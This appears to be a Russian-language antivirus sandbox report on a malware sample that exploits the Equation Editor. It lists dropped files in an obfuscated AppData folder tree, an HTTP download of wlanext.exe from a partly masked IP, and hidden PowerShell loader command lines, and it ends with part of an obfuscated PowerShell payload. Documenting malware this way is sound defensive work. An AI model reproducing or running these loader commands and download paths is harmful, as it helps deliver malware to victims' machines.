Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '' (загружен из сети Интернет)
Создает и запускает на исполнение (эксплоит)
- '%APPDATA%\wlanext.exe'
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\wlanext.exe
- %TEMP%\nsl35c0.tmp
- %APPDATA%\forsakes\pterosauria\arhythmia\kaffeslaberasers\claudian\systole.dup
- %APPDATA%\forsakes\pterosauria\arhythmia\kaffeslaberasers\claudian\eructation.vrt
- %APPDATA%\forsakes\pterosauria\arhythmia\imbosoming\recanting\hysterogenous57\velartikuleretheden\foretagendens226.pse
- %APPDATA%\forsakes\pterosauria\arhythmia\hibbet62\biofag.san
- %APPDATA%\forsakes\pterosauria\arhythmia\bdeforlgs\impregns.hel
- %APPDATA%\forsakes\pterosauria\arhythmia\bdeforlgs\positionslisters.txt
Сетевая активность
Подключается к
- '19#.#2.81.254':80
TCP
Запросы HTTP GET
- http://19#.#2.81.254/3458/wlanext.exe
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle minimized $fe32 = Get-Content '%APPDATA%\Forsakes\pterosauria\arhythmia\kaffeslaberasers\Claudian\Eructation.Vrt' ; powershell.Exe "$fe32"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle minimized $fe32 = Get-Content '%APPDATA%\Forsakes\pterosauria\arhythmia\kaffeslaberasers\Claudian\Eructation.Vrt' ; powershell.Exe "$fe32"' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Ametabolism Postprocess Raceadskillelsernes Smilehuls Groups sunbaths Rhodope #>$Fuldfrelsers = """sd;TaF Gu HnKecHetPoiDaoAmnGy HaVHeAReR A5Ko3 D Pe{Su es Ta An RkpBoaYorFiaInmSa(Fa[ MSUnt ...
